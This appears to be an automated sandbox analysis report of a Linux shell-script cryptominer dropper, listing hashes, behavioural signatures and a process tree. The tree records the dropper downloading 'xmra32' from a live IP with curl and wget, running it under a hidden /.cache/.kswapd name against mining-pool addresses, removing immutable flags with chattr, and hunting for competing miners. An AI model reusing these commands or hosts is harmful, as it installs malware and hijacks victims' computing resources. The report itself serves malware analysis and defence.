Analysis
- max time kernel: 130s
- max time network: 132s
- platform: debian-9_armhf
- resource: debian9-armhf-20240418-en
- resource tags: arch:armhf image:debian9-armhf-20240418-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
- submitted: 30-06-2024 18:39
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
ioc              pid   process
/.cache/.kswapd  853   .kswapd
/.cache/.kswapd  1029  .kswapd
-
Attempts to change immutable files 27 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
pid   process
807   grep
932   chattr
985   grep
997   grep
801   grep
993   grep
1005  grep
831   grep
973   grep
767   grep
771   grep
825   grep
981   grep
989   grep
759   grep
785   grep
791   grep
775   grep
780   grep
796   grep
718   chattr
818   grep
763   grep
977   grep
1001  grep
1009  grep
1013  grep
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
description                   ioc                           process
File opened for modification  /usr/local/bin/.e9bFa2Eb3D9B  80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
description              ioc            process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
-
Reads CPU attributes 1 TTPs 6 IoCs
Processes:
description              ioc                             process
File opened for reading  /sys/devices/system/cpu/online  ps
File opened for reading  /sys/devices/system/cpu/online  ps
File opened for reading  /sys/devices/system/cpu/online  ps
File opened for reading  /sys/devices/system/cpu/online  ps
File opened for reading  /sys/devices/system/cpu/online  ps
File opened for reading  /sys/devices/system/cpu/online  ps
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
description              ioc                        process
File opened for reading  /proc/942/stat             ps
File opened for reading  /proc/728/stat             ps
File opened for reading  /proc/103/stat             ps
File opened for reading  /proc/6/cmdline            ps
File opened for reading  /proc/113/stat             ps
File opened for reading  /proc/41/stat              ps
File opened for reading  /proc/112/cmdline          ps
File opened for reading  /proc/649/exe              grep
File opened for reading  /proc/143/status           ps
File opened for reading  /proc/156/status           ps
File opened for reading  /proc/140/status           ps
File opened for reading  /proc/147/status           ps
File opened for reading  /proc/21/status            ps
File opened for reading  /proc/592/stat             ps
File opened for reading  /proc/28/stat              ps
File opened for reading  /proc/sys/kernel/pid_max   ps
File opened for reading  /proc/23/cmdline           ps
File opened for reading  /proc/592/stat             ps
File opened for reading  /proc/929/cmdline          ps
File opened for reading  /proc/110/status           ps
File opened for reading  /proc/649/cmdline          ps
File opened for reading  /proc/962/cmdline          ps
File opened for reading  /proc/156/stat             ps
File opened for reading  /proc/745/status           ps
File opened for reading  /proc/945/status           ps
File opened for reading  /proc/275/stat             ps
File opened for reading  /proc/24/status            ps
File opened for reading  /proc/28/status            ps
File opened for reading  /proc/697/stat             ps
File opened for reading  /proc/103/cmdline          ps
File opened for reading  /proc/18/stat              ps
File opened for reading  /proc/112/cmdline          ps
File opened for reading  /proc/13/status            ps
File opened for reading  /proc/721/status           ps
File opened for reading  /proc/28/status            ps
File opened for reading  /proc/304/status           ps
File opened for reading  /proc/25/cmdline           ps
File opened for reading  /proc/11/stat              ps
File opened for reading  /proc/6/status             ps
File opened for reading  /proc/696/cmdline          ps
File opened for reading  /proc/635/stat             ps
File opened for reading  /proc/274/status           ps
File opened for reading  /proc/746/stat             ps
File opened for reading  /proc/24/cmdline           ps
File opened for reading  /proc/303/cmdline          ps
File opened for reading  /proc/745/cmdline          ps
File opened for reading  /proc/967/stat             ps
File opened for reading  /proc/24/status            ps
File opened for reading  /proc/930/stat             ps
File opened for reading  /proc/25/cmdline           ps
File opened for reading  /proc/969/stat             ps
File opened for reading  /proc/7/stat               ps
File opened for reading  /proc/274/status           ps
File opened for reading  /proc/7/status             ps
File opened for reading  /proc/16/cmdline           ps
File opened for reading  /proc/272/status           ps
File opened for reading  /proc/940/status           ps
File opened for reading  /proc/8/cmdline            ps
File opened for reading  /proc/285/stat             ps
File opened for reading  /proc/304/cmdline          ps
File opened for reading  /proc/321/status           ps
File opened for reading  /proc/12/stat              ps
File opened for reading  /proc/650/status           ps
File opened for reading  /proc/724/cmdline          ps
-
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
description                   ioc                    process
File opened for modification  /dev/shm/.e9bFa2Eb3D9B  80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description                   ioc                 process
File opened for modification  /tmp/.e9bFa2Eb3D9B  80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
Format: process path (tree depth): command line; signature hits are listed beneath each entry.
- /tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh (depth 1): /tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
  - Write file to user bin folder
  - Writes file to shm directory
  - Writes file to tmp directory
- /bin/uname (depth 2): uname -a
- /bin/rm (depth 2): rm --help
- /bin/grep (depth 2): grep " rm does not remove dir"
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/curl (depth 2): curl --help
  - Checks CPU configuration
- /bin/grep (depth 2): grep -i "Dump libcurl equivalent"
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/wget (depth 2): wget --version
- /bin/grep (depth 2): grep -i "wgetrc "
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/head (depth 2): head /dev/urandom
- /usr/bin/tr (depth 2): tr -dc A-Za-z0-9
- /usr/bin/shuf (depth 2): shuf -i 4-16 -n 1
- /usr/bin/head (depth 2): head -c 12
- /bin/rm (depth 2): rm -f /tmp/.e9bFa2Eb3D9B
- /bin/rm (depth 2): rm -f /tmp/.e9bFa2Eb3D9B
- /bin/rm (depth 2): rm -f /usr/local/bin/.e9bFa2Eb3D9B
- /bin/rm (depth 2): rm -f /dev/shm/.e9bFa2Eb3D9B
- /bin/rm (depth 2): rm -f /.e9bFa2Eb3D9B
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v "sh "
- /bin/grep (depth 2): grep " sleep 120"
- /usr/bin/wc (depth 2): wc -l
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v "sh "
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep " sleep 120"
- /usr/bin/wc (depth 2): wc -l
- /bin/sleep (depth 2): sleep 120
- /bin/mkdir (depth 2): mkdir -p /.cache/
- /usr/bin/chattr (depth 2): chattr -i /.cache/
  - Attempts to change immutable files
- /bin/chmod (depth 2): chmod 1755 /.cache/
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v l0
- /bin/grep (depth 2): grep -v eth1
- /bin/grep (depth 2): grep -v lan0
- /bin/grep (depth 2): grep -v "^-"
- /bin/grep (depth 2): grep -v eth0
- /bin/grep (depth 2): grep -v inet0
- /bin/grep (depth 2): grep -v lano
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v knthread
- /bin/grep (depth 2): grep -vi aaaaaaaaaa
- /bin/grep (depth 2): grep -vi "java "
- /bin/grep (depth 2): grep -vi jenkins
- /bin/grep (depth 2): grep -vi exim
- /usr/bin/awk (depth 2): awk "{if(\$3>=54.0) print \$11}"
- /usr/bin/head (depth 2): head -n 1
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v l0
- /bin/grep (depth 2): grep -v eth1
- /bin/grep (depth 2): grep -v lan0
- /bin/grep (depth 2): grep -v "^-"
- /bin/grep (depth 2): grep -v eth0
- /bin/grep (depth 2): grep -v inet0
- /bin/grep (depth 2): grep -v lano
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v python
- /bin/grep (depth 2): grep -v knthread
- /bin/grep (depth 2): grep -vi aaaaaaaaaa
- /bin/grep (depth 2): grep -vi bash
- /bin/grep (depth 2): grep -vi exim
- /usr/bin/awk (depth 2): awk "{if(\$3>=0.0) print \$2}"
- /usr/bin/uniq (depth 2): uniq
- /bin/readlink (depth 2): readlink /proc/303/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/303/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/304/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/304/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/315/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/315/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/592/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/592/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/595/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/595/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/635/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/635/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/636/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/636/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/640/cwd
- /bin/cat (depth 2): cat /proc/640/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/641/cwd
- /bin/cat (depth 2): cat /proc/641/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/642/cwd
- /bin/cat (depth 2): cat /proc/642/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/649/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/649/exe
  - Attempts to change immutable files
  - Reads runtime system information
- /bin/rm (depth 2): rm -rf /usr/sbin/agent
- /bin/readlink (depth 2): readlink /proc/650/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/650/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/651/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/651/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/716/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/716/exe
  - Attempts to change immutable files
- /bin/grep (depth 2): grep x86_64
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/curl (depth 2): curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
  - Checks CPU configuration
- /usr/bin/wget (depth 2): wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
- /bin/chmod (depth 2): chmod +x /.cache/.kswapd
- /bin/sleep (depth 2): sleep 120
- /bin/mkdir (depth 2): mkdir -p /.cache/
- /usr/bin/chattr (depth 2): chattr -i /.cache/
  - Attempts to change immutable files
- /bin/chmod (depth 2): chmod 1755 /.cache/
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v eth1
- /bin/grep (depth 2): grep -v l0
- /bin/grep (depth 2): grep -v lan0
- /bin/grep (depth 2): grep -v "^-"
- /bin/grep (depth 2): grep -v eth0
- /bin/grep (depth 2): grep -v inet0
- /bin/grep (depth 2): grep -v lano
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v knthread
- /bin/grep (depth 2): grep -vi aaaaaaaaaa
- /bin/grep (depth 2): grep -vi "java "
- /bin/grep (depth 2): grep -vi jenkins
- /bin/grep (depth 2): grep -vi exim
- /usr/bin/awk (depth 2): awk "{if(\$3>=54.0) print \$11}"
- /usr/bin/head (depth 2): head -n 1
- /bin/ps (depth 2): ps aux
  - Reads CPU attributes
  - Reads runtime system information
- /bin/grep (depth 2): grep -v l0
- /bin/grep (depth 2): grep -v eth1
- /bin/grep (depth 2): grep -v lan0
- /bin/grep (depth 2): grep -v "^-"
- /bin/grep (depth 2): grep -v eth0
- /bin/grep (depth 2): grep -v inet0
- /bin/grep (depth 2): grep -v lano
- /bin/grep (depth 2): grep -v grep
- /bin/grep (depth 2): grep -v defunct
- /bin/grep (depth 2): grep -v python
- /bin/grep (depth 2): grep -v knthread
- /bin/grep (depth 2): grep -vi aaaaaaaaaa
- /bin/grep (depth 2): grep -vi bash
- /bin/grep (depth 2): grep -vi exim
- /usr/bin/awk (depth 2): awk "{if(\$3>=0.0) print \$2}"
- /usr/bin/uniq (depth 2): uniq
- /bin/readlink (depth 2): readlink /proc/303/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/303/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/304/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/304/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/315/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/315/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/592/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/592/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/595/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/595/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/640/cwd
- /bin/cat (depth 2): cat /proc/640/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/641/cwd
- /bin/cat (depth 2): cat /proc/641/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/642/cwd
- /bin/cat (depth 2): cat /proc/642/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/905/cwd
- /bin/cat (depth 2): cat /proc/905/comm
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" //kworker/u2:2
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/928/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/928/exe
  - Attempts to change immutable files
- /bin/readlink (depth 2): readlink /proc/930/exe
- /bin/grep (depth 2): grep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe
  - Attempts to change immutable files
- /usr/bin/cut (depth 2): cut -c 1-32
- /usr/bin/md5sum (depth 2): md5sum /.cache/.kswapd
- /usr/bin/md5sum (depth 2): md5sum /.cache/.kswapd
- /usr/bin/cut (depth 2): cut -c 1-32
- /bin/grep (depth 2): grep x86_64
- /usr/bin/wc (depth 2): wc -l
- /usr/bin/curl (depth 2): curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
  - Checks CPU configuration
- /usr/bin/wget (depth 2): wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
- /bin/chmod (depth 2): chmod +x /.cache/.kswapd
- /.cache/.kswapd (depth 1): /.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
  - Executes dropped EXE
- /.cache/.kswapd (depth 1): /.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
/tmp/.e9bFa2Eb3D9B
Filesize: 13B
MD5: 119e988d14765ff8d6f26841f49eaa46
SHA1: 12f83e1dec392d08d17703f0f091631ad12524b6
SHA256: 7ebef7ecc2d830825ff28a987c274b65628ffb3bc8c8e50d5f084bbb6864af34
SHA512: a93a33d7079111b8aabc3029ad1a836a1a11a44351d9584c5e2d4c236f1dc87cbe2eb28ac56485e334491da0650618da001fb1fb76f9fa90aa9e4d5af432603e
-
memory/1027-1-0xb6bb3000-0xb6bc4044-memory.dmp